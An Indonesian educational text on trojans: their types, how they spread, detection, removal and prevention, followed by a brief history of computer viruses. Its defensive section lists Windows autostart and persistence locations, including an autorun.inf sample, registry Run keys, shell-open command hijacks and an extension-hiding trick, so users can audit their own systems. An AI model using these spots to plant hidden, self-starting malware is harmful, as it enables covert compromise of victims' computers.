(BO), yang terdiri dari BOSERVE.EXE yang dijalankan dikomputer korban dan BOGUI.EXE yang dijalankan oleh penyerang untuk mengakses komputer korban.2.4.2 Trojan Pengirim PasswordTujuan dari Trojan jenis ini adalah mengirimkan password yang berada di komputer korban atau di Internet ke suatu e-mail khusus yang telah disiapkan. Contoh password yang disadap misalnya untuk ICQ, IRC, FTP, HTTP atau aplikasi lain yang memerlukan seorang pemakai untuk masuk suatu login dan password. Kebanyakan Trojan ini menggunakan port 25 untuk mengirimkan e-mail. Jenis ini sangat berbahaya jika dalam komputer terdapat password yang sangat penting.2.4.3 Trojan File Transfer Protocol (FTP)Trojan FTP adalah paling sederhana dan dianggap ketinggalan jaman. Satu-satunya fungsi yang dijalankan adalah membuka port 21 di komputer korban yang menyebabkan mempermudah seseorang memiliki FTP client untuk memasuki komputer korban tanpa password serta melakukan download atau upload file.2.4.4 KeyloggersKeyloggers termasuk dalam jenis Trojan yang sederhana, dengan fungsi merekam atau mencatat ketukan tombol saat korban melakukan pengetikan dan menyimpannya dalam logfile. Apabila diantara ketukan tersebut adalah mengisi user name dan password, maka keduanya dapat diperoleh penyerang dengan membaca logfile. Trojan ini dapat dijalankan pada saat komputer online maupun offline.

Deteksi Trojan dan PenanganannyaTrojan ini dapat mengetahui korban sedang online dan merekam segala sesuatunya. Pada saat offline proses perekaman dilakukan setelah Windows dijalankan dan disimpan dalam hardisk korban dan menunggu saat online untuk melakukan transfer atau diambil oleh penyerang.2.4.5 Trojan PenghancurSatu-satunya fungsi dari jenis ini adalah untuk menghancurkan dan menghapus file. Trojan penghancur termasuk jenis yang sederhana dan mudah digunakan, namun sangat berbahaya. Sekali terinfeksi dan tidak dapat melakukan penyelamatan maka sebagian atau bahkan semua file sistem akan hilang. Trojan ini secara otomatis menghapus semua file sistem pada komputer korban (sebagai contoh : *.dll, *.ini atau *.exe). Trojan diaktifkan oleh penyerang atau bekerja seperti sebuah logic bomb dan mulai bekerja dengan waktu yang ditentukan oleh penyerang.2.4.6 Trojan Denial of Service (DoS) AttackTrojan DoS Attack saat ini termasuk yang sangat populer. Trojan ini mempunyai kemampuan untuk menjalankan Distributed DoS (DDoS) jika mempunyai korban yang cukup. Gagasan utamanya adalah bahwa jika penyerang mempunyai 200 korban pemakai ADSL yang telah

terinfeksi, kemudian mulai menyerang korban secara serempak. Hasilnya adalah lalu lintas data yang sangat padat karena permintaan yang bertubi-tubi dan melebihi kapasitas band width korban. Hal tersebut menyebabkan akses Internet menjadi tertutup. Wintrinoo adalah suatu tool DDoS yang populer baru-baru ini, dan jika penyerang telah menginfeksi pemakai ADSL, maka beberapa situs utama Internet akan collaps. Variasi yang lain dari sebuah trojan DoS adalah trojan mail-bomb, tujuan utamanya adalah untuk menginfeksi sebanyak mungkin komputer dan melakukan penyerangan secara serempak ke alamat e-mail yang spesifik maupun alamat lain yang spesifik dengan target yang acak dan muatan/isi yang tidak dapat disaring.

Deteksi Trojan dan Penanganannya2.4.7 Trojan Proxy/WingateBentuk dan corak yang menarik diterapkan oleh pembuat trojan untuk mengelabui korban dengan memanfaatkan suatu Proxy/Wingate server yang disediakan untuk seluruh dunia atau hanya untuk penyerang saja. Trojan Proxy/Wingate digunakan pada Telnet yang tanpa nama, ICQ, IRC, dan untuk mendaftarkan domain dengan nomor kartu kredit yang telah dicuri serta untuk aktivitas lain yang tidak sah. Trojan ini melengkapi penyerang dengan keadaan tanpa nama dan memberikan kesempatan untuk berbuat segalanya terhadap komputer korban dan jejak yang tidak dapat ditelusuri.2.4.8 Software Detection KillersBeberapa Trojan telah dilengkapi dengan kemampuan melumpuhkan fungsi software pendeteksi, tetapi ada juga program yang berdiri sendiri dengan fungsi yang sama. Contoh software pendeteksi yang dapat dilumpuhkan fungsinya adalah Zone Alarm, Norton Anti-Virus dan program anti-virus/firewall yang lain berfungsi melindungi komputer. Ketika software pendeteksi dilumpuhkan, penyerang akan mempunyai akses penuh ke komputer korban, melaksanakan beberapa aktivitas yang tidak sah, menggunakan komputer korban untuk menyerang komputer yang lain.2.5 Sumber-sumber TrojanBanyak pemakai komputer/Internet yang mempunyai sedikit pengetahuan tentang asal muasal sebuah Trojan, mereka beranggapan bahwa sumber Trojan hanya dari proses download dan menjalankan server.exe. Sebenarnya banyak jalan atau sumber Trojan untuk menginfeksi komputer seseorang yang berawal dari menggunakan Trojan untuk aktivitas yang tidak sah [8].Komputer korban dapat disusupi Trojan dengan berbagai macam cara atau berasal dari sumber-sumber tertentu. Sumber-sumber tersebut adalah sebagai berikut [8].2.5.1 ICQICQ adalah media komunikasi yang populer, namun sebenarnya merupakan media yang sangat mungkin mengakibatkan seseorang terkena Trojan, terutama sewaktu

Deteksi Trojan dan Penanganannyaseseorang mengirimkan file. Terdapat bug pada ICQ yang memungkinkan seseorang mengirimkan file *.exe ke orang lain, namun file tersebut akan seperti file *.bmp atau *.jpg atau jenis file lain sesuai keinginan. Hal ini sangat berbahaya, pengirim dapat mengirimkan file *.exe tetapi dengan bentuk *.jpg atau *.bmp dan mengatakan bahwa ini foto si pengirim. Penerima akan menerima file tersebut dan menjalankannya dengan rasa aman, karena file yang diterima berupa file gambar. Jika pengirim adalah seorang penyerang, maka dengan mudah menyusupkan file Trojan ke dalam komputer penerima (korban). Hal inilah yang menyebabkan orang ragu menggunakan ICQ.2.5.2 IRCMedia yang digemari banyak orang adalah chatting menggunakan IRC. Seperti halnya ICQ, IRC media penyebaran Trojan yang efektif. Cara yang digunakan juga hampir sama dengan ICQ, yaitu dengan cara mengirimkan file-file tertentu yang menarik bagi pemakai IRC dan di dalam file tersebut telah disisipkan program Trojan. Tawaran dari pengirim yang sekaligus sebagai penyerang misalnya dengan hal-hal yang bersifat pornografi, software untuk melakukan akses Internet secara bebas, hacking program Hotmail dan sebagainya. Target utama penyerang biasanya adalah pemakai baru Internet (newbies) maupun pemakai lama tetapi belum mengetahui tentang keamanan dalam berinternet.2.5.3 AttachmentAttachment dalam e-mail juga merupakan media penyebaran Trojan. Banyak penyerang menggunakan media attachment, karena media ini adalah salah satu media yang efektif untuk menyerang korban secara massal dengan cara mengirimkan e-mail. Attachment yang dikirimkan berisi hal-hal yang menarik misalnya pornografi, layanan bebas berinternet, password dan sebagainya. Selain dengan cara tersebut, penyerang juga menggunakan cara lain yaitu dengan menyadap e-mail address dan attachment dari seseorang yang sedang mengirimkan e-mail ke temannya. Setelah disadap oleh penyerang, attachment disisipi program Trojan dan kemudian dikirimkan ke target e-mail. Penerima e-mail akan merasakan

Deteksi Trojan dan Penanganannyabahwa e-mail yang dikirimkan berasal dari temannya dan tanpa ragu-ragu membuka attachment yang telah tersisipi Trojan.2.5.4 Physical AccessAkses fisik dalam komputer adalah hal yang sangat vital. Media akses fisik adalah dengan disket, Compact Disc (CD) maupun flash ROM. Dengan media tersebut, Trojan dapat menyusup ke dalam komputer dan dapat mengaktifkan dirinya ketika terkoneksi dengan Internet. Caranya adalah dengan menyebar melalui komputer yang telah terinfeksi, kemudian komputer digunakan untuk meng-copy file ke dalam media. Selanjutnya file yang

berada dalam media di-copykan lagi ke komputer lain, sehingga komputer tersebut juga terinfeksi. Cara lainnya adalah dengan memanfaatkan fasilitas autorun dalam fungsi pembacaan CD. Saat CD dimasukkan ke CDROM drive, secara otomatis akan membaca fasilitas autorun yang berada dalam Autorun.inf dalam CD, yaitu :[autorun]open=setup.exeicon=setup.exeJika sebuah CD dengan fasilitas autorun dan telah disisipi program Trojan, maka sangat mudah bagi penyerang untuk menyusupkan Trojan ke dalam komputer orang lain.2.5.5 Lubang Software Browser dan E-mailDalam penggunaan software aplikasi untuk browser dan e-mail, seringkali pemakai tidak memperhatikan masalah update software. Pemakai enggan memperbaharui versi softwarenya padahal mereka seharusnya melakukan update setiap saat. Hal ini membawa keuntungan bagi penyerang karena pemakaian software versi lama lebih mudah untuk disusupi. Software versi lama tentunya mempunyai banyak kelemahan atau bug jika dibandingkan dengan versi barunya. Misalnya kasus pemakaian software versi lama Internet Explorer yang digunakan untuk mengunjungi sebuah situs malicious, kemudian secara otomatis menginfeksi komputer tanpa melakukan proses download atau menjalankan program apapun. Situs malicious tersebut akan memeriksa secara otomatis software yang digunakan dan mencari kelemahannya.

Deteksi Trojan dan PenanganannyaHal yang sama juga terjadi dalam pemakaian software untuk memeriksa e-mail misal pemakaian Outlook Express versi lama. Oleh karena itu, update software atau menggunakan software versi terbaru perlu dilakukan. Hal ini dapat menekan atau meminimalkan kemungkinan terinfeksinya komputer yang melewati software browser dan e-mail.2.5.6 Netbios (File Sharing)File sharing dapat dilakukan dengan cara membuka port 139 . Jika port tersebut terbuka dan diketahui oleh penyerang, maka dapat digunakan sebagai jalan untuk menyusupkan Trojan. Caranya adalah dengan meng-install trojan.exe dan memodifikasi file sistem di komputer korban. Trojan yang telah disisipkan akan aktif setiap kali komputer dihidupkan.Kadang-kadang penyerang juga melengkapi dengan DoS yang digunakan melumpuhkan kerja komputer. Komputer dipaksa untuk booting ulang, sehingga Trojan dapat mengaktifkan sendiri bersama proses booting.2.6 Program Gadungan, Situs Yang Tidak Dapat Dipercaya dan Software FreewareDari keterangan sebelumnya telah dijelaskan tentang sumber-sumber Trojan yang digunakan sebagai media penyebarannya. Beberapa cara dilakukan oleh penyerang untuk mengelabuhi korbannya saat menggunakan Internet. Tawaran yang dilakukan untuk

mengelabuhi adalah dengan menggunakan program gadungan (fake program), situs yang tidak dapat dipercaya (untrusted sites) dan software yang didapatkan secara gratis (freeware). Pemakai komputer perlu berhati-hati dengan tawaran tersebut. Sebagai contoh dari ketiga tawaran diatas adalah sebagai berikut [7].1. Pemanfaatan fasilitas freeware SimpleMail. Software ini sengaja dibuat menarik namun didalamnya telah disisipi Trojan. Komputer korban yang telah diproteksi dengan software proteksi tetapi tidak dapat mendeteksi keberadaan Trojan. Saat SimpleMail digunakan, maka fungsi Trojan yang tersembunyi akan membuka port 25 atau 110 untuk POP 3 dan menghubungkan komputer korban ke komputer penyerang. Selanjutnya penyerang dapat menyadap

Deteksi Trojan dan Penanganannyaapapun yang diketik korban, misalnya nomor kartu kredit, user id, password dan sebagainya. Selanjutnya data-data tersebut digunakan oleh penyerang untuk aktivitas yang tidak sah.2. Pemanfaatan fasilitas free web space. Fasilitas ini memungkinkan seseorang untuk menempatkan situsnya secara gratis. Penyedia layanan ini misalnya Xoom, Tripod dan Geocities. Banyak pemakai yang memanfaatkan layanan ini, termasuk para hacker yang memanfaatkan fasilitas ini sebagai media penyebaran Trojan. Melakukan download menjadi berbahaya jika situs di layanan ini telah terinfeksi oleh Trojan.3. Download untuk mendapatkan software freeware. Dalam mendapatkan software yang gratis perlu dipertimbangkan, karena dengan media ini Trojan dapat disusupkan. Ada pepatah bahwa “gratis tidak selalu yang terbaik”. Jika memang diperlukan, maka perlu dipastikan bahwa file di-download dari sumber aslinya.2.7 Port Yang Digunakan TrojanTrojan sesuai dengan fungsinya akan membuka pintu belakang berupa port dengan nomor tertentu. Adanya port yang tidak lazim terbuka mengindikasikan adanya kegiatan aktif Trojan [7].Port-port yang telah diketahui sebagai media koneksi trojan terlampir pada lampiran Trojan Port List yang diambil dari sumber http://www.glocksoft.com, pada tanggal 11 September 2004.2.8 Apa Yang Dicari PenyerangSebagian pemakai Internet beranggapan bahwa Trojan hanya bersifat merusak saja. Anggapan tersebut tidak benar, karena Trojan dapat digunakan alat untuk mata-mata dan melakukan penyadapan pada beberapa komputer korban. Data yang disadap berupa data pribadi maupun informasi yang sensitif (misalnya spionase dalam industri) [8].

Deteksi Trojan dan Penanganannya

Contoh hal-hal yang diminati penyerang adalah sebagai berikut [8].• Informasi Kartu Kredit.• Data akuntansi (e-mail passwords, dial-up passwords dan webservices passwords).• E-mail Addresses.• Work Projects (dokumen pekerjaan).• Nama anak-anak dengan foto dan umurnya.• Dokumen sekolah.Pada dasarnya, pengamanan sistem dapat dibedakan menjadi dua cara, yaitu pencegahan (preventiv) dan pengobatan (recovery). Keduanya dibedakan berdasarkan waktu terjadinya infeksi. Usaha pencegahan dilakukan sebelum terjadinya infeksi, yaitu usaha agar sistem tidak mempunyai lubang keamanan. Usaha pengobatan dilakukan setelah sistem terinfeksi, yaitu usaha untuk menutup lubang kemanan yang telah dieksploitasi dan menghilangkan penyebab infeksi

3.1 Deteksi TrojanKadang-kadang pemakai komputer menganggap normal perilaku komputer yang menjalankan program tertentu dan memakai hardisk dengan kapasitas yang besar. Bahkan tidak curiga karena telah terpasang software anti-virus yang dianggap telah mampu menangkal keberadaan Trojan. Banyak yang mengira bahwa dengan anti-virus yang selalu di update dari situs pembuatnya, maka pemakai telah aman dari masalah di Internet dan tidak akan terinfeksi trojan atau komputernya diakses orang lain. Anggapan tersebut tidak benar, karena banyak jalan dilakukan oleh penyerang untuk menyusup ke komputer korban [7].Tanda-tanda terserangnya komputer oleh Trojan dapat diketahui dengan melihat perilaku tampilan komputer dan melakukan deteksi dengan anti-virus maupun trojan scanner. Tanda-tanda yang diperlihatkan oleh tampilan komputer dan patut dicurigai adalah sebagai berikut [1][8].• Saat mengunjungi suatu situs, terdapat beberapa pop-up yang muncul dan telah mengunjungi salah satu pop-up. Tetapi ketika akan mengakhiri kunjungan (tidak sepenuhnya dikunjungi), tiba-tiba browser mengarahkan dan membuka secara otomatis beberapa halaman tidak dikenal.Deteksi Trojan dan Penanganannya• Tampilan Kotak Pesan yang tak dikenal dan tampak di layar monitor. Pesan berisi beberapa pertanyaan yang bersifat pribadi.• Tampilan Windows mengalami perubahan dengan sendirinya, misalnya teks screensaver yang baru, tanggal/waktu, perubahan volume bunyi dengan sendirinya, pointer mouse bergerak sendirinya, CD-ROM drive membuka dan menutup sendiri.• Outlook Express menggunakan waktu yang cukup lama saat menutup (close) atau terlihat hang (menggantung) ketika melihat preview-nya,• Adanya file yang rusak atau hilang,

• Program yang tidak diketahui aktif terlihat di task list,• Tanda atau informasi dari firewall tentang outbound komunikasi dari sumber yang tidak diketahui.Sebagian tanda-tanda diatas biasanya dilakukan oleh penyerang tingkat pemula dengan ciri memberikan tanda atau pesan di layar monitor. Hal ini berbeda dengan penyerang tingkat lanjut, ia akan berusaha untuk menutupi dirinya dan menghilangkan jejaknya saat melakukan penyusupan. Penyerang tingkat lanjut melakukan penyadapan dan menggunakan komputer yang infeksi untuk beberapa alasan yang spesifik, serta tidak menggunakan cara-cara seperti penyerang tingkat pemula. Sehingga aktivitasnya diam-diam dan tidak mencurigakan.Pendeteksian Trojan dapat dilakukan dengan cara-cara sebagai berikut [1].1. Task ListCara pendeteksiannya adalah dengan melihat daftar program yang sedang berjalan dalam task list. Daftar dapat ditampilkan dengan menekan tombol CTRL+ALT+DEL. Selain dapat mengetahui program yang berjalan, pemakai dapat melakukan penghentian terhadap suatu program yang dianggap aneh dan mencurigakan. Namun beberapa Trojan tetap mampu menyembunyikan dari task list ini. Sehingga untuk mengetahui secara program yang berjalan secara keseluruhan perlu dibuka System Information Utility (msinfo32.exe) yang berada di C:\Program files\common files\microsoft shared\msinfo. Tool ini dapat melihat semua proses itu sedang berjalan, baik yang

Deteksi Trojan dan Penanganannyatersembunyi dari task list maupun tidak. Hal-hal yang perlu diperiksa adalah path, nama file, properti file dan berjalannya file *.exe serta file *.dll.2. NetstatSemua Trojan membutuhkan komunikasi. Jika mereka tidak melakukan komunikasi berarti tujuannya sia-sia. Hal ini adalah kelemahan yang utama dari Trojan, dengan komunikasi berarti mereka meninggalkan jejak yang kemudian dapat ditelusuri. Perintah Netstat berfungsi membuka koneksi ke dan dari komputer seseorang. Jika perintah ini dijalankan maka akan menampilkan IP address dari komputer tersebut dan komputer yang terkoneksi dengannya. Jika ditemukan IP address yang tidak dikenal maka perlu diselidiki lebih lanjut, mengejar dan menangkapnya.3. TCP ViewTCPVIEW adalah suatu free utility dari Sysinternals yang mempunyai kemampuan menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk koneksi dengan komputer pemakai. Dengan menggunakan informasi tersebut, maka jika terjadi penyerangan dapat diketahui dan dapat melakukan serangan balik.3.2 Menghapus Trojan

Trojan sering memodifikasi file startup, menambahkan atau mengubah baris di sistem registry dan bahkan melakukan overwrite terhadap sistem file untuk meyakinkan mereka dapat dijalankan setiap kali komputer booting. Dengan alasan tersebut, maka untuk menghapus Trojan diperlukan waktu yang cukup lama, kesabaran dan suatu pemahaman apa yang harus dilakukan. Proses menghapus Trojan adalah proses yang penuh dengan bahaya, termasuk membuang registry atau kehilangan kemampuan untuk menjalankan program [1].Langkah-langkah sederhana yang dilakukan untuk menghapus Trojan dari komputer adalah : [8]

1. Mengidentikasi file Trojan di dalam hardisk,

Deteksi Trojan dan Penanganannya2. Menemukan bagaimana Trojan mengaktifkan dirinya dan mengambil tindakan yang perlu untuk mencegahnya berjalannya Trojan setelah reboot,3. Reboot komputer dan menghapus Trojan,4. Mengamati proses penyembuhan dari suatu halaman System Compromise dan membantu penyembuhannya.Langkah di atas adalah salah satu pilihan untuk membuang Trojan dari komputer. Ada pendapat lain yang intinya juga menghapus keberadaan Trojan dengan beberapa pilihan. Pilihan-pilihan tersebut memang tidak sempurna, karena varian Trojan sangat banyak. Cara tersebut adalah sebagai berikut [3].1. Membersihkan dengan cara instalasi ulang.2. Pemakaian Software Anti-Virus.3. Pemakaian Software Trojan Scanner.4. Memanfaatkan bantuan dari IRC Channels.3.2.1 Anti Virus (AV) ScannerAnti-virus berfungsi untuk mendeteksi virus, bukan untuk mendeteksi Trojan. Namun ketika Trojan mulai populer dan menyebabkan banyak masalah, pembuat anti-virus menambahkan data-data trojan ke dalam anti-virusnya. Anti-virus ini tidak dapat mencari dan menganalisa Trojan secara keseluruhan. Anti-virus dapat mendeteksi Trojan berdasarkan nama-namanya yang telah dimasukkan ke database anti-virus [7][8].Anti-virus juga tidak termasuk dalam kategori firewall yang mencegah seseorang yang tidak diundang mengakses komputer orang lain. Program anti-virus tidak dapat sepenuhnya melindungi sistem komputer seseorang dari serangan Trojan tetapi hanya meminimalkan kemungkinan itu [7].3.2.2 Trojan ScannerSebagian anti-virus dapat mendeteksi keberadaan Trojan melalui pendeteksian nama-nama

filenya. Pendeteksian yang efektif adalah menggunakan Trojan Scanner,

Deteksi Trojan dan Penanganannyayang khusus digunakan untuk mendeteksi Trojan. Proses pendeteksian dilakukan dengan cara melakukan scanning terhadap port-port yang terbuka [7].Trojan membuka port tertentu sebagai jalan belakang (backdoor) untuk menyerang targetnya. Salah satu contoh trojan scanner adalah Anti-Trojan. Scanner ini memeriksa Trojan dengan melakukan proses :• port scanning,• memeriksa registry,• memeriksa hardisk.Jika ditemukan adanya Trojan, maka dilakukan penangan dengan beberapa pilihan untuk menghapus Trojan.3.3 Penanganan Pengobatan (Recovery)Jika dalam suatu komputer telah ditemukan adanya hacking oleh Trojan, maka menghapus atau menutup fasilitas sharing tidaklah cukup. Karena suatu penyerang dapat dengan mudah menciptakan jalan lain (backdoors) ke dalam sistem atau memodifikasi sistem operasi untuk dirinya sendiri. Oleh karena itu hanya ada satu jalan yang nyata untuk mengamankan suatu yang sistem, yaitu meng-install ulang dengan menggunakan program yang asli [1].Berikut ini akan disampaikan uraian langkah-langkah yang diperlukan dalam rangka pengobatan/penyembuhan suatu sistem. Langkah-langkah yang diperlukan adalah sebagai berikut [1]1. Mengisolasi komputer yang telah terinfeksi.Untuk mengisolasi komputer, maka semua hubungan dengan komputer tersebut harus diputuskan, baik dengan Internet maupun jaringan lokalnya. Melepaskan kabel jaringan dan mematikan kerja modem. Cara ini berarti memutuskan hubungan antara komputer dengan penyerang. Sebagian orang beranggapan bahwa membiarkan kabel tetap terpasang dan modem dalam kondisi standby telah mengisolasi suatu komputer. Dalam beberapa kasus anggapan tersebut adalah tidak benar. Sebab kondisi tersebut memungkinkan komputer tetap tersambung dengan jaringan.

Deteksi Trojan dan Penanganannya2. Menemukan masalah-masalah yang serius.Jika sebuah komputer terpasang dalam suatu jaringan maka ada beberapa resiko yang harus dihadapi. Resiko yang dihadapi mencakup :• lamanya waktu eksploitasi keamanan yang tidak diketahui,• tipe jaringan yang digunakan,

• pemakaian dan pemeliharaan anti-virus atau firewall,• kepastian bahwa suatu program yang akan di-install belum dirubah.3. Mengawali dengan proses pembersihanMenggunakan dan memastikan bahwa program yang akan digunakan asli. Proses pembersihan diawali dengan backup data, kemudian format ulang hardisk dan install ulang program. Dalam penanganan backup data diperlukan prosedur :• melepaskan hubungan dengan jaringan lain,• meng-copy file data ke dalam disket atau CD, dan memastikan bahwa Program Files tidak ter-copy,• memberikan label atau tulisan terhadap data yang telah terinfeksi dan menyimpan di tempat yang aman.4. Mengamankan sistem dan menggunakan software tambahanSetelah melakukan proses pembersihan, maka dalam komputer diperlukan tambalan keamanan dengan memasang software anti-virus, trojan scanner atau firewall mutakhir yang berfungsi mengamankan sistem. Sistem operasi yang digunakan menggunakan fasilitas update yang secara otomatis meng-update sistemnya.5. Restore backup dataSetelah proses instalasi dan pengaturan semua software selesai, proses selanjutnya adalah menempatkan kembali data yang telah di backup. Sebelum data disimpan kembali ke komputer, perlu dilakukan pembersihan dan membuang semua bentuk infeksi. Setelah selesai, maka komputer siap digunakan lagi untuk berinternet. Banyak pengetahuan yang harus diketahui untuk memastikan bahwa selama memakai Internet terbebas dari serangan dari luar atau infeksi lain.

Deteksi Trojan dan Penanganannya3.4 Pencegahan Agar Terhindar Dari TrojanBeberapa cara dapat dilakukan untuk menghindari agar tidak terinfeksi Trojan. Salah satu cara masuk Trojan untuk menginfeksi suatu sistem adalah melewati file yang di download. Maka perlu ada perlakuan khusus dengan cara mengkarantina hasil download sebelum yakin bahwa file tersebut benar-benar aman [7].Cara lain yang bersifat mencegah (preventif) dan merupakan informasi yang umum yang dapat dilakukan oleh seseorang yang menggunakan komputer untuk berinternet, adalah sebagai berikut [3].1. Memilih situs yang benar-benar dapat dipercaya untuk melakukan download. Jangan pernah melakukan download secara sembarangan yang berasal dari seseorang atau situs yang tidak dapat dipercaya.2. Memastikan bahwa file yang dikirimkan belum pernah dibuka oleh orang lain.3. Mewaspadai file-file yang ekstensionnya disembunyikan.

4. Memastikan bahwa di dalam komputer tidak ada program yang berjalan secara otomatis atau mode file preview.5. Jangan selalu merasa aman bila di komputer telah terpasang software anti-virus/trojan scanner,6. Memastikan bahwa tidak melakukan download program executable “check it out”. Ini adalah sebuah Trojan. Jika program ini dijalankan, maka komputer telah terinfeksi Trojan.Selain pengetahuan di atas, maka pengetahuan tentang proses berjalannya komputer juga perlu dipahami, khususnya saat sistem komputer menjalankan program untuk pertama kalinya. Dalam beberapa kasus, hal ini digunakan oleh Trojan untuk mengeksekusi dirinya. Paparan berikut sekaligus melengkapi bagian sebelumnya.

Deteksi Trojan dan PenanganannyaCara komputer menjalankan program untuk pertama kalinya (secara otomatis) adalah sebagai berikut. [2]1. Start Up FolderSemua program yang berada di folder ini akan dijalankan secara otomatis ketika Windows dijalankan.C:\windows\start menu\program\startupDirektori tersebut tersimpan di dalam registry key :HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell2. Win.ini[windows]load=file.exerun=file.exePada load dan run dapat diisi dengan nama program yang akan dijalankan saat pertama kali Windows dijalankan.3. System.ini [boot]Shell=Explorer.exe file.exeNama program diletakkan setelah explorer.exe.4. C:\windows\winstart.batProgram yang dapat dijalankan di winstart.bat adalah yang mempunyai perilaku seperti bat file.5. Registry[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunSevices][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run][HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce][HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]

Deteksi Trojan dan PenanganannyaProgram yang terdapat pada registry key di atas semuanya dijalankan saat pertama kali Windows berjalan.6. C:\windows\wininit.iniProgram ini digunakan untuk setup, yaitu akan dijalankan sekali lalu akan dihapus oleh Windows. Sebagai contoh isi dari file ini adalah :[Rename]NUL=c:\windows\file.exePerintah tersebut akan mengirim c:\windows\file.exe ke proses NUL, yang berarti dihapus. Ini tidak membutuhkan interaksi dari pemakai dan berjalan sepenuhnya di background.7. Autoexec.batProgram ini akan berjalan secara otomatis dalam DOS level.8. Registry Shell Spawning[HKEY_CLASSES_ROOT\exefile\shell\open\command]@=”\”%1”%*”[HKEY_CLASSES_ROOT\comfile\shell\open\command]@=”\”%1”%*”[HKEY_CLASSES_ROOT\batfile\shell\open\command]@=”\”%1”%*”[HKEY_CLASSES_ROOT\htafile\shell\open\command]@=”\”%1”%*”[HKEY_CLASSES_ROOT\piffile\shell\open\command]@=”\”%1”%*”[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @=”\”%1”%*”[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @=”\”%1”%*”

[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @=”\”%1”%*”[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\shell\open\command] @=”\”%1”%*”[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @=”\”%1”%*”Value key yang sesungguhnya adalah ”\”%1”%*”, jika telah diubah menjadi “file.exe %1%*”, maka file yang berekstensi exe/pif/com/bat/hta akanDeteksi Trojan dan Penanganannyadijalankan. Sebagian Trojan juga menggunakan registry ini untuk mengaktifkan dirinya.9. ICQ Net[HKEY_CURRENT_USER\Software\Mirabillis\ICQ\Agent\Apps\test]“Path”=”test.exe”“Startup”=”c:\test”“Parameters”=””“Enable”=”Yes”Registry key di atas akan dijalankan jika IQC net mendeteksi adanya koneksi Internet.10. Lain-lain[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap]@=”Scrap object” ”NeverShowExt”=””Bagian key ”NeverShowExt” mempunyai fungsi menyembunyikan ekstensi aslinya. Hal ini dapat dimanfaatkan oleh Trojan untuk menyembunyikan dirinya.Pemakai dapat melakukan pemeriksaan terhadap komputernya dengan cara melihat setting sistem saat pertama kali berjalan. Jika terdapat nama-nama file yang mencurigakan dan bukan merupakan bagian dari sistem yang diinginkan maka patut dicurigai.

http://xandrosx.blogspot.com/2009/01/pengertian-trojan.html

VIRUSES

Virus komputer adalah suatu program komputer yang menduplikasi atau menggandakandiri dengan menyisipkan kopian atau salinan dirinya ke dalam media penyimpanan /dokumen serta ke dalam jaringan secara diam-diam tanpa sepengetahuan penggunakomputer tersebut. Efek dari virus komputer sangat beragam mulai dari hanya munculpesan-pesan aneh hingga merusak komputer serta menghapus file atau dokumen kita.

Sejarah Virus KomputerBerikut adalah sekilas sejarah mengenai virus komputer.

1981 Virus ‘in the wild’ pertama ditemukan. Virus yang bernama Elk Cloner ini menyebar melalui floppy disk pada komputer Apple II.

1983 Fred Cohen dalam paper-nya yang berjudul ‘Computer Viruses – Theory andExperiments’ memberikan definisi pertama mengenai virus komputer danmemaparkan eksperimen yang telah dilakukannya untuk membuktikan konsep dari sebuah virus komputer. Bersama dengan Len Adelman, ia menciptakan sebuah contoh virus pada komputer VAX 11/750 dengan sistem operasi Unix.

1986 Sepasang kakak adik dari Pakistan, Basit dan Amjad, menciptakan sebuah boot sector virus pertama yang diberi nama Brain. Brain sering kali disebut sebagai virus komputer pertama di dunia. PC-based Trojan pertama diciptakan dalam bentuk program shareware yang diberi nama PC-Write. Dalam beberapa laporan disebutkan bahwa file virus pertama, Virdem, juga ditemukan pada tahun yang sama. Virdem diciptakan oleh Ralf Burger.

1987 Virus-virus file infector seperti Leigh mulai bermunculan, kebanyakan menyerang file COM seperti COMMAND.COM. Pada tahun yang sama muncul virus penyerang file-file EXE pertama, Suriv 01 dan 02 serta Jerusalem. Mainframe IBM mengalami serangan worm IBM Christmas Worm dengan kecepatan replikasi setengah juta kopi per jam.

1988 Virus pertama yang menyerang komputer Macintosh, MacMag dan Scores, muncul. Pada tahun yang sama didirikan CERT (Computer Emergency Response Team) oleh DARPA dengan tujuan awalnya untuk mengatasi serangan Morris Worm yang diciptakan oleh Robert Morris.

1989 AIDS Trojan muncul sebagai trojan yang menggunakan samaran sebagai AIDS information program. Ketika dijalankan trojan ini akan mengenkripsi hard drive dan meminta pembayaran untuk kunci dekripsinya.

1990 Virus Exchange Factory (VX) BBS yang merupakan forum diskusi online parapencipta virus didirikan di Bulgaria. Mark Ludwig menulis buku “The Little Black Book of Computer Viruses” yang berisi cara-cara untuk menciptakan berbagai jenis virus komputer.

1991 Virus polymorphic pertama, Tequila, muncul di Swiss. Virus ini dapat mengubah dirinya untuk menghindari deteksi.

1992 Kehadiran virus Michaelangelo yang menjadi ancaman bagi seluruh dunia, namun demikian kerusakan yang ditimbulkan pada akhirnya tidak terlalu hebat. Kemuculan beberapa tool yang dapat digunakan untuk menciptakan virus sepertiDark Avenger Mutation Engine (DAME) yang dapat mengubah virus apa punmenjadi virus polymorphic, dan Virus Creation Lab (VCL) yang merupakan kit pertama yang dapat digunakan untuk menciptakan virus.

1995 Para hacker dengan nama ‘Internet Liberation Front’ melakukan banyak serangan pada hari Thanksgiving. Beberapa badan yang menjadi korban serangan ini adalah Griffith Air Force Base, Korean Atomic Research Institute, NASA, GE, IBM, dll. Virus macro pertama yang menyerang aplikasi Microsoft Word, Concept, dikembangkan.

1996 Kemunculan virus Boza yang didesain khusus untuk menyerang file-file Windows 95, virus Laroux yang merupakan virus penyerang Microsoft Excel pertama, virus Staog yang merupakan virus Linux pertama.

